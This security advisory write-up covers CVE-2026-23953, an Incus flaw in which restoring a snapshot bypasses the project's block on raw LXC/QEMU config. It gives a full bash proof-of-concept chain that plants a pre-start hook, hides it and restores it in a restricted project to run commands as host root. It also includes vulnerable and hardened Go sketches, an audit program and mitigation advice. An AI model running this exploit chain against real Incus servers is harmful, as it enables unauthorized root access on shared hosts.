How CVE-2026-23953 Works
CVE-2026-23953 is a high-severity vulnerability in Incus, a system container and virtual machine manager. The core issue lies in how Incus handles instance snapshots in relation to project-level security restrictions.
Incus allows administrators to restrict projects using the `restricted.containers.lowlevel=block` setting. This configuration is designed to prevent users from using low-level container options, such as raw LXC configuration (raw.lxc) or raw QEMU configuration (raw.qemu). These raw configurations can be used to define lifecycle hooks (e.g., lxc.hook.pre-start) that execute commands on the host.
The vulnerability arises because instance snapshots do not respect this `restricted.containers.lowlevel=block` setting. When an instance is snapshotted, the low-level configuration (including malicious hooks) is preserved in the snapshot’s metadata. When this snapshot is later restored, the restrictions are not re-evaluated, allowing the previously blocked raw configuration to take effect.
This flaw is particularly dangerous because snapshots can be moved between servers. An attacker with access to an unrestricted project can:
1. Create a malicious instance with a raw hook configured (e.g., raw.lxc='lxc.hook.pre-start = /bin/sh -c "/bin/id > /lxc-hook-prestart"').
2. Create a snapshot of this malicious instance.
3. Remove the raw configuration from the instance itself (to bypass basic checks).
4. Move the instance (along with its snapshot) to a restricted project on a target server.
5. Restore the snapshot, which re-injects the malicious hook.
6. Start the instance, triggering the hook and executing arbitrary commands as root on the host.
In practice, this allows a malicious actor to completely bypass project restrictions and achieve arbitrary command execution with root privileges on the Incus server.
DailyCVE Form
Platform: Incus
Version: 6.20.0 and below
Vulnerability: Restriction Bypass
Severity: High (8.7)
Date: 2026-01-22
Prediction: 2026-02-15
What Undercode Says: Analytics
The vulnerability stems from a logic flaw in the snapshot restoration process: the restriction check is performed when an instance is created or modified, but it is not re-evaluated when a snapshot is restored. This is a classic time-of-check to time-of-use (TOCTOU) style bypass, in which the security control is not applied consistently across all state transitions.
Bash Commands and PoC:
# On the remote, restricted project
incus project set rem:project restricted=true
incus project set rem:project restricted.containers.lowlevel=block
# On the local, unrestricted project
incus init images:debian/trixie rce-raw-lxc
incus config set rce-raw-lxc raw.lxc='lxc.hook.pre-start = /bin/sh -c "/bin/id > /lxc-hook-prestart"'
incus snapshot create rce-raw-lxc snap0
# Remove the raw config to avoid detection
incus config unset rce-raw-lxc raw.lxc
# Transfer the instance to the restricted project
incus move rce-raw-lxc rem: --mode push
# Restore the snapshot (this re-injects the hook)
incus snapshot restore rem:rce-raw-lxc snap0
# Start the instance, triggering the hook
incus start rem:rce-raw-lxc
Code Snippet (Vulnerable Logic):
// Vulnerable: Missing validation during snapshot restore
func (s snapshot) Restore() error {
// The low-level config from the snapshot is applied directly
// without checking the project's restricted.containers.lowlevel setting
return s.instance.applyConfig(s.snapshotConfig)
}
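A hardened form of the sketch above, added here as an example (it is not Incus's actual patch): the project's restriction is re-checked at restore time, before any of the snapshot's stored config is applied. The types are stand-ins for the page's snippet; the `raw.` prefix match and the assumed blocking default for a restricted project without an explicit lowlevel key are this example's assumptions.

```go
package main

import (
	"fmt"
	"strings"
)

// Stand-in types mirroring the page's sketch; not Incus's real API.
type project struct{ config map[string]string }
type instance struct{ project *project; config map[string]string }
type snapshot struct{ instance *instance; snapshotConfig map[string]string }

// lowLevelBlocked reports whether raw.* keys are forbidden in the project.
// A restricted project with the key absent is assumed to take the blocking default.
func lowLevelBlocked(p *project) bool {
	if p.config["restricted"] != "true" {
		return false
	}
	v, ok := p.config["restricted.containers.lowlevel"]
	return !ok || v == "block"
}

// checkLowLevel rejects raw.* keys (the page names raw.lxc and raw.qemu; the
// prefix match here is deliberately broader) when the project blocks them.
func checkLowLevel(p *project, cfg map[string]string) error {
	if !lowLevelBlocked(p) {
		return nil
	}
	for k := range cfg {
		if strings.HasPrefix(k, "raw.") {
			return fmt.Errorf("%s is blocked by restricted.containers.lowlevel", k)
		}
	}
	return nil
}

// Restore re-validates the snapshot's stored config against the project the
// instance currently lives in, before any of it is applied.
func (s *snapshot) Restore() error {
	if err := checkLowLevel(s.instance.project, s.snapshotConfig); err != nil {
		return err
	}
	return s.instance.applyConfig(s.snapshotConfig)
}

func (i *instance) applyConfig(cfg map[string]string) error {
	i.config = cfg
	return nil
}
```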
Exploit
An attacker can exploit this vulnerability by:
- Crafting a Malicious Instance: In an unrestricted project, create an instance with a `raw.lxc` or `raw.qemu` hook that executes arbitrary commands.
- Creating a Snapshot: Take a snapshot of this instance to embed the malicious configuration.
- Cleaning the Instance: Remove the raw configuration from the instance to avoid triggering alerts.
- Moving the Instance: Transfer the instance (with its snapshot) to a restricted project on a target server.
- Restoring the Snapshot: Restore the snapshot, which overwrites the instance’s configuration with the malicious hooks.
- Triggering the Payload: Start the instance, causing the hook to execute as root on the host.
This exploit chain allows a user with `can_edit` permissions on a VM or container instance to escalate privileges to host root.
Protection
- Update Incus: Apply the security update provided by your distribution. The fix is included in Incus versions 6.0.6 and 6.21.0. Debian trixie users should update to 6.0.4-2+deb13u7.
- Restrict Snapshot Operations: Limit which users can create, restore, or move snapshots, especially across project boundaries.
- Audit Raw Configurations: Regularly audit instances for the presence of `raw.lxc` and `raw.qemu` configurations, even in restricted projects.
- Monitor for Suspicious Hooks: Implement monitoring to detect the execution of unexpected lifecycle hooks on the host.
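To support the audit recommendation above, an added example (not from the page or the Incus project) that walks instances and their snapshots and reports raw.* keys sitting in lowlevel-blocked projects. It assumes the JSON layout of `incus project list -f json` and `incus list --all-projects -f json` (name, config, project, snapshots) and treats a restricted project without an explicit lowlevel key as blocking.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// Field subsets only; the layout is assumed to follow `incus project list -f json`
// and `incus list --all-projects -f json` (name, config, project, snapshots).
type named struct {
	Name   string            `json:"name"`
	Config map[string]string `json:"config"`
}
type instanceInfo struct {
	named
	Project   string  `json:"project"`
	Snapshots []named `json:"snapshots"`
}
// auditRawConfig reports every raw.* key in a lowlevel-blocked project, whether on
// the instance itself or stored in one of its snapshots (the case this CVE exploits).
func auditRawConfig(projectsJSON, instancesJSON string) ([]string, error) {
	projects, instances := []named{}, []instanceInfo{}
	if err := json.Unmarshal([]byte(projectsJSON), &projects); err != nil {
		return nil, err
	}
	if err := json.Unmarshal([]byte(instancesJSON), &instances); err != nil {
		return nil, err
	}
	blocked := map[string]bool{} // project name -> raw.* keys forbidden there
	for _, p := range projects {
		v, ok := p.Config["restricted.containers.lowlevel"] // absent key assumed to default to block
		blocked[p.Name] = p.Config["restricted"] == "true" && (!ok || v == "block")
	}
	var findings []string
	for _, inst := range instances {
		if !blocked[inst.Project] {
			continue
		}
		for _, c := range append([]named{inst.named}, inst.Snapshots...) {
			for k := range c.Config {
				if strings.HasPrefix(k, "raw.") {
					findings = append(findings, fmt.Sprintf("%s/%s: %s in %s", inst.Project, inst.Name, k, c.Name))
				}
			}
		}
	}
	return findings, nil
}
```

Feed it the output of the two `incus` commands named in the lead-in; a finding that names a snapshot rather than the instance itself is exactly the scrubbed-instance, armed-snapshot pattern this CVE relies on.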
Impact
- Bypass of Project Restrictions: The `restricted.containers.lowlevel=block` setting is rendered ineffective, allowing low-level container options in restricted projects.
- Arbitrary Command Execution: An attacker can execute arbitrary commands on the Incus server with root privileges.
- Privilege Escalation: A user with `can_edit` permissions on an instance can escalate to host root.
- Cluster Compromise: In a clustered environment, this vulnerability can be used to compromise the entire Incus cluster.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode